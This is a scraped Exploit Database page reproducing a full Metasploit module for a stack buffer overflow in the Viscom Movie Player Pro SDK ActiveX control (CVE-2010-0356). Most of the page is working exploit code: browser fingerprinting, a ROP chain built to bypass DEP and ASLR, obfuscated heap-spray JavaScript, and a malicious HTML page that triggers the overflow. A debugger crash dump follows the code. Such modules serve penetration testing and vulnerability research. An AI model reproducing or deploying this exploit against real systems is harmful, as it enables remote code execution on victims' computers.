Viscom Software Movie Player Pro SDK ActiveX 6.8 – Stack Buffer Overflow (Metasploit)

• Exploit Database
• 115 阅读

• 作者： Metasploit
  日期： 2011-11-20
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18134/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225

  ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking   include Msf::Exploit::Remote::HttpServer::HTML   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;Viscom Software Movie Player Pro SDK ActiveX 6.8&apos;, &apos;Description&apos;=> %q{ Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows remote attackers to execute arbitrary code via a long strFontName parameter to the DrawText method.   The victim will first be required to trust the publisher Viscom Software. This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7 with Java support. }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;shinnai&apos;, # Vulnerability discovery and original exploit &apos;TecR0c&apos;,# Metasploit module &apos;mr_me&apos;# Metasploit module ], &apos;Version&apos;=> &apos;$Revision: $&apos;, &apos;References&apos; => [ [ &apos;CVE&apos;, &apos;2010-0356&apos; ], [ &apos;OSVDB&apos;, &apos;61634&apos; ], [ &apos;URL&apos;, &apos;http://www.exploit-db.com/exploits/12320/&apos; ], ], &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => &apos;process&apos;, &apos;DisablePayloadHandler&apos; => &apos;false&apos;, &apos;InitialAutoRunScript&apos; => &apos;migrate -f&apos; }, &apos;Payload&apos;=> { &apos;Space&apos;=> 1024, &apos;BadChars&apos; => "\x00" }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;Automatic&apos;, {} ], [ &apos;Windows IE6-7&apos;, {} ], [ &apos;Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)&apos;, {} ] ], &apos;DisclosureDate&apos; => &apos;Jan 12 2010&apos;, &apos;DefaultTarget&apos;=> 0))   register_options( [ OptBool.new(&apos;OBFUSCATE&apos;, [false, &apos;Enable JavaScript Obfuscation&apos;, true]) ], self.class) end   # Prevent module from being executed in autopwn def autofilter false end   def check_dependencies use_zlib end   def junk(n=4) return rand_text_alpha(n).unpack("L")[0].to_i end   def on_request_uri(cli, request)   # Set target manually or automatically my_target = target if my_target.name == &apos;Automatic&apos; agent = request.headers[&apos;User-Agent&apos;] if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/ my_target = targets[1] # XP elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/ my_target = targets[1] # XP elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/ my_target = targets[2] # XP elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/ my_target = targets[1] # Vista elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8\.0/ my_target = targets[2] # Vista elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/ my_target = targets[2] # Win7 end end   sploit = rand_text_alpha(32)   pivot_addr = 0x1126cfe4   if my_target.name =~ /IE8/   pivot_rop = [ # Pivot to get to ROP Chain 0x10015201, # POP EBP # RETN 08 [MOVIEP~1.OCX] pivot_addr, 0x10014361, # MOV ESP,EBP # POP EBP # RETN 08** [MOVIEP~1.OCX] junk, # ---------------------^ junk, # ----------------------^ junk, # ----------------------^ junk, # -------------------------------------^ junk, # -------------------------------------^ 0x1001c049, # RETN (ROP NOP) [MOVIEP~1.OCX] ].pack("V*")   sploit << pivot_rop   code = [0x7C347F98].pack("V") * 4 # RETN (ROP NOP) [MSVCR71.dll]   code << [ # MSVCR71.dll - rop chain generated with mona.py 0x7C37653D, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0xFFFFFDFF, # Value to negate, will become 0x00000201 (dwSize) 0x7C347F98, # RETN (ROP NOP) 0x7C3415A2, # JMP [EAX] 0xFFFFFFFF, # 0x7C376402, # Skip 4 bytes 0x7C351E05, # NEG EAX # RETN 0x7C345255, # INC EBX # FPATAN # RETN 0x7C352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN 0x7C344F87, # POP EDX # RETN 0xFFFFFFC0, # Value to negate, will become 0x00000040 0x7C351EB1, # NEG EDX # RETN 0x7C34D201, # POP ECX # RETN 0x7C38B001, # &Writable location 0x7C347F97, # POP EAX # RETN 0x7C37A151, # Ptr to &VirtualProtect() - 0x0EF 0x7C378C81, # PUSHAD # ADD AL,0EF # RETN 0x7C345C30, # Ptr to &apos;push esp&apos; # ret ].pack("V*")   code << payload.encoded else code = payload.encoded sploit << [pivot_addr].pack(&apos;V*&apos;) end   # Payload in JS format code = Rex::Text.to_unescape(code)   spray = <<-JS var heap_lib = new heapLib.ie(0x20000); var code = unescape("#{code}"); var nops = unescape("%u0c0c%u0c0c");   while (nops.length < 0x2000) nops += nops; var offset = nops.substring(0, 0x800-0x20); var shellcode = offset + code + nops.substring(0, 0x2000-offset.length-code.length);   while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x7fb00-6)/2);   heap_lib.gc();   for (var i = 0; i < 0x200; i++) { heap_lib.alloc(block); } JS   # Use heaplib js = heaplib(spray)   # Obfuscate on demand if datastore[&apos;OBFUSCATE&apos;] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end   # Randomize the javascript variable names vname = rand_text_alpha(rand(100) + 1) strname = rand_text_alpha(rand(100) + 1)   html = %Q|<html> <object classid=&apos;clsid:F4A32EAF-F30D-466D-BEC8-F4ED86CAF84E&apos; id=&apos;#{vname}&apos;></object> <script>#{js}</script> <script language=&apos;vbscript&apos;>   #{strname} = "#{sploit}"   #{vname}.DrawText 1, 1, 1, "", 1, #{strname}, True, True, True, 1, 1, 1, 1, 1, 1   </script> </html> | print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")   # Transmit the response to the client send_response_html(cli, html) end   end =begin (78c.1d8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=000079f3 ebx=00000000 ecx=0203f298 edx=7c90e4f4 esi=008de5c0 edi=0287f2f4 eip=41414141 esp=0203f300 ebp=0203f4a0 iopl=0 nv up ei pl nz na pe nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010206 41414141 ?????   0:005> dd @esp 0203f30041414141 41414141 41414141 41414141 0203f31041414141 41414141 41414141 41414141 0203f32041414141 41414141 41414141 41414141 0203f33041414141 41414141 41414141 41414141 0203f34041414141 41414141 41414141 41414141 0203f35041414141 41414141 41414141 41414141 0203f36041414141 41414141 41414141 41414141 0203f37041414141 41414141 41414141 41414141 =end